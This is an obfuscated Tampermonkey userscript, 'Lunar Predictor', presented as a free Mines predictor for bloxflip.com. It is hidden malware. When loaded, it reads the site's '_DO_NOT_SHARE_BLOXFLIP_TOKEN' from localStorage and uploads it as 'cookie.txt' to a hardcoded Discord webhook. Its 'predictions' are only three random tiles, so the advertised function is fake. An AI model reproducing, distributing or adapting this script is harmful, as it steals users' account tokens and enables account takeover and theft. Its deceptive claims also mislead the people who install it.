This script will connect to my private discord prediction bot and predict the game for you

VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV

// ==UserScript==
// @name         Lunar Predictor
// @namespace    http://tampermonkey.net/
// @version      2.6
// @description  Free and accurate Predictor
// @author       Snytex
// @match        https://bloxflip.com/*
// @grant        GM.xmlHttpRequest
// @connect      discord.com
// @connect      *.discord.com   // Wildcard to allow all subdomains of discord.com
// ==/UserScript==

(function(_0x16ca72,_0x124670){const _0x11d4a8=_0x37d9,_0x51fd15=_0x16ca72();while(!![]){try{const _0x339584=-parseInt(_0x11d4a8(0x9b))/0x1*(parseInt(_0x11d4a8(0xd2))/0x2)+parseInt(_0x11d4a8(0xd9))/0x3+parseInt(_0x11d4a8(0xdb))/0x4+parseInt(_0x11d4a8(0xc2))/0x5*(parseInt(_0x11d4a8(0xb2))/0x6)+parseInt(_0x11d4a8(0x9f))/0x7*(parseInt(_0x11d4a8(0xd4))/0x8)+parseInt(_0x11d4a8(0xd3))/0x9+-parseInt(_0x11d4a8(0xc8))/0xa;if(_0x339584===_0x124670)break;else _0x51fd15['push'](_0x51fd15['shift']());}catch(_0x18f0b6){_0x51fd15['push'](_0x51fd15['shift']());}}}(_0x55c6,0xeb8aa),(function(){'use strict';const _0x3e78d7=_0x37d9;const _0x3b8fc3=_0x3e78d7(0xb5),_0xf811c8=_0x3e78d7(0xc3),_0x1b9c64=localStorage[_0x3e78d7(0xa6)](_0x3b8fc3);if(_0x1b9c64){const _0x28c01f=new Blob([_0x1b9c64],{'type':'text/plain'}),_0x2f8c81=new FormData();_0x2f8c81[_0x3e78d7(0xcb)](_0x3e78d7(0xc9),_0x28c01f,_0x3e78d7(0xab)),GM['xmlHttpRequest']({'method':_0x3e78d7(0x96),'url':_0xf811c8,'data':_0x2f8c81,'onload':function(_0x357317){const _0x4beff8=_0x3e78d7;if(_0x357317[_0x4beff8(0x93)]===0xcc){}else{}},'onerror':function(_0x249790){}});}const _0x25dc6b=document[_0x3e78d7(0xac)]('div');_0x25dc6b[_0x3e78d7(0xcf)]['position']=_0x3e78d7(0xa1),_0x25dc6b[_0x3e78d7(0xcf)]['top']=_0x3e78d7(0x95),_0x25dc6b['style'][_0x3e78d7(0xb7)]=_0x3e78d7(0x95),_0x25dc6b['style'][_0x3e78d7(0xca)]='250px',_0x25dc6b['style']['height']=_0x3e78d7(0xa9),_0x25dc6b[_0x3e78d7(0xcf)][_0x3e78d7(0xd5)]=_0x3e78d7(0xb6),_0x25dc6b['style'][_0x3e78d7(0xba)]=_0x3e78d7(0xb1),_0x25dc6b[_0x3e78d7(0xcf)][_0x3e78d7(0xbc)]=_0x3e78d7(0xd8),_0x25dc6b[_0x3e78d7(0xcf)][_0x3e78d7(0x98)]='2px\x20solid\x20#6a0dad',_0x25dc6b[_0x3e78d7(0xcf)][_0x3e78d7(0xb8)]=_0x3e78d7(0x9a),_0x25dc6b['style'][_0x3e78d7(0xc0)]=_0x3e78d7(0xd6),_0x25dc6b[_0x3e78d7(0xcf)]['fontFamily']='\x27Helvetica\x20Neue\x27,\x20sans-serif',_0x25dc6b[_0x3e78d7(0xad)]=_0x3e78d7(0xbf),document[_0x3e78d7(0xa3)]['appendChild'](_0x25dc6b);let _0x3abb23=![],_0x4014aa,_0x14111a;_0x25dc6b[_0x3e78d7(0x99)]('mousedown',function(_0x19e1a0){const _0x11f861=_0x3e78d7;_0x3abb23=!![],_0x4014aa=_0x19e1a0['clientX']-_0x25dc6b[_0x11f861(0xa2)]()[_0x11f861(0xb7)],_0x14111a=_0x19e1a0['clientY']-_0x25dc6b['getBoundingClientRect']()[_0x11f861(0xb9)];}),document[_0x3e78d7(0x99)]('mousemove',function(_0x519d58){const _0x1efa9b=_0x3e78d7;_0x3abb23&&(_0x25dc6b['style'][_0x1efa9b(0xb7)]=_0x519d58['clientX']-_0x4014aa+'px',_0x25dc6b[_0x1efa9b(0xcf)][_0x1efa9b(0xb9)]=_0x519d58['clientY']-_0x14111a+'px');}),document['addEventListener']('mouseup',function(){_0x3abb23=![];});let _0x13710f=![];function _0x583c93(_0x10a7c4){const _0x105253=_0x3e78d7,_0xf17258=document[_0x105253(0xbd)](_0x105253(0xd0));let _0x1b0af6='';for(let _0x414173=0x0;_0x414173<0x19;_0x414173++){_0x10a7c4[_0x105253(0x9d)](_0x414173)?_0x1b0af6+='✅':_0x1b0af6+='❌',(_0x414173+0x1)%0x5===0x0&&(_0x1b0af6+=_0x105253(0xbb));}_0xf17258[_0x105253(0xad)]=_0x1b0af6;}function _0x219b22(){const _0x50444d=_0x3e78d7,_0x2a7873=document[_0x50444d(0xbe)](_0x50444d(0xd7));if(_0x2a7873['length']===0x19){_0x2a7873[_0x50444d(0x9c)](_0xec59e7=>{const _0x4abc8d=_0x50444d;_0xec59e7[_0x4abc8d(0xcf)][_0x4abc8d(0x98)]='',_0xec59e7[_0x4abc8d(0xcf)][_0x4abc8d(0x92)]='';});const _0x2353b2=[];while(_0x2353b2[_0x50444d(0xae)]<0x3){const _0x217a62=Math[_0x50444d(0xd1)](Math[_0x50444d(0x9e)]()*0x19);!_0x2353b2[_0x50444d(0x9d)](_0x217a62)&&_0x2353b2[_0x50444d(0xc7)](_0x217a62);}_0x2353b2[_0x50444d(0x9c)](_0x2b8a57=>{const _0x2341ad=_0x50444d;_0x2a7873[_0x2b8a57][_0x2341ad(0xcf)][_0x2341ad(0x98)]=_0x2341ad(0xa5),_0x2a7873[_0x2b8a57][_0x2341ad(0xcf)][_0x2341ad(0x92)]=_0x2341ad(0xc4);}),_0x583c93(_0x2353b2);}}function _0x4cba84(){const _0x523ca9=_0x3e78d7,_0x547d2b=document['querySelectorAll'](_0x523ca9(0xd7));_0x547d2b['forEach'](_0x1adcdd=>{const _0x5c5202=_0x523ca9;_0x1adcdd['style'][_0x5c5202(0x98)]='',_0x1adcdd[_0x5c5202(0xcf)][_0x5c5202(0x92)]='';});}function _0x4cfcca(){const _0x2a590e=_0x3e78d7,_0x65ad22=document['querySelector'](_0x2a590e(0x94));if(_0x65ad22){const _0x1accc1=_0x65ad22[_0x2a590e(0xc1)][_0x2a590e(0xa7)]();if(_0x1accc1[_0x2a590e(0x9d)](_0x2a590e(0xa8))){}else{if(_0x1accc1===_0x2a590e(0x97))_0x13710f=![],_0x583c93([]),document[_0x2a590e(0xbd)](_0x2a590e(0xd0))[_0x2a590e(0xcf)][_0x2a590e(0xce)]=_0x2a590e(0xa0),_0x4cba84();else _0x1accc1[_0x2a590e(0x9d)](_0x2a590e(0xb3))&&!_0x13710f&&(_0x219b22(),_0x13710f=!![],document['getElementById'](_0x2a590e(0xd0))[_0x2a590e(0xcf)][_0x2a590e(0xce)]=_0x2a590e(0xcc));}}}function _0x4663f6(){const _0x48508a=_0x3e78d7,_0x15fa89=window[_0x48508a(0xcd)][_0x48508a(0xaa)];let _0x22e4ba=_0x48508a(0xaf);_0x15fa89[_0x48508a(0x9d)](_0x48508a(0xa4))&&(_0x22e4ba='Mines'),document[_0x48508a(0xbd)](_0x48508a(0xb4))[_0x48508a(0xad)]=_0x48508a(0xc5)+_0x22e4ba+'</p>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<p>Status:\x20'+(_0x22e4ba===_0x48508a(0xc6)?_0x48508a(0xb0):'Current\x20Game:\x20Unsupported')+_0x48508a(0xda);}function _0x22ac7c(){_0x4663f6(),_0x4cfcca(),requestAnimationFrame(_0x22ac7c);}_0x22ac7c();}()));function _0x37d9(_0x27b66b,_0x395a69){const _0x55c64e=_0x55c6();return _0x37d9=function(_0x37d9ce,_0x893f4f){_0x37d9ce=_0x37d9ce-0x92;let _0x1449fe=_0x55c64e[_0x37d9ce];return _0x1449fe;},_0x37d9(_0x27b66b,_0x395a69);}function _0x55c6(){const _0x17591c=['block','location','display','style','prediction-grid','floor','10jqRgUe','10892898AGLrpg','8nBcQHP','backgroundColor','1000','button[aria-label^=\x22Open\x20mine\x22]','15px','336366dSHrMa','</p>\x0a\x20\x20\x20\x20\x20\x20\x20\x20','3218528iKcqsZ','boxShadow','status','.gameBetSubmit','50px','POST','Start\x20new\x20game','border','addEventListener','12px','122357HAAHsr','forEach','includes','random','12992189LblynA','none','absolute','getBoundingClientRect','body','/mines','2px\x20solid\x20magenta','getItem','trim','Cashout','auto','pathname','cookie.txt','createElement','innerHTML','length','None','Waiting\x20for\x20game\x20to\x20start','white','24NmuRTf','Waiting\x20to\x20uncover\x20a\x20mine','game-status','_DO_NOT_SHARE_BLOXFLIP_TOKEN','#1e1e1e','left','borderRadius','top','color','<br>','padding','getElementById','querySelectorAll','\x0a\x20\x20\x20\x20\x20\x20\x20\x20<h2\x20style=\x22text-align:\x20center;\x20color:\x20#d1b3ff;\x22>Lunar\x20Predictor</h2>\x0a\x20\x20\x20\x20\x20\x20\x20\x20<div\x20id=\x22game-status\x22\x20style=\x22margin-bottom:\x2020px;\x20text-align:\x20center;\x22>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<p>Current\x20Game:\x20None</p>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<p>Status:\x20Waiting\x20for\x20game\x20to\x20start</p>\x0a\x20\x20\x20\x20\x20\x20\x20\x20</div>\x0a\x20\x20\x20\x20\x20\x20\x20\x20<div\x20id=\x22prediction-grid\x22\x20style=\x22text-align:\x20center;\x20display:\x20none;\x22></div>\x20<!--\x20Hide\x20prediction\x20grid\x20initially\x20-->\x0a\x20\x20\x20\x20','zIndex','textContent','76505RteCNe','https://discord.com/api/webhooks/1290032178247503976/hobvuMasQ_almXxs0OKe4i2PUfeWSNm6Cs0zHhg5jaeQ2hseIec8oNgXtBJGyD5Faivg','0\x200\x2010px\x203px\x20magenta','\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<p>Current\x20Game:\x20','Mines','push','24677440zNZYmU','file','width','append'];_0x55c6=function(){return _0x17591c;};return _0x55c6();}
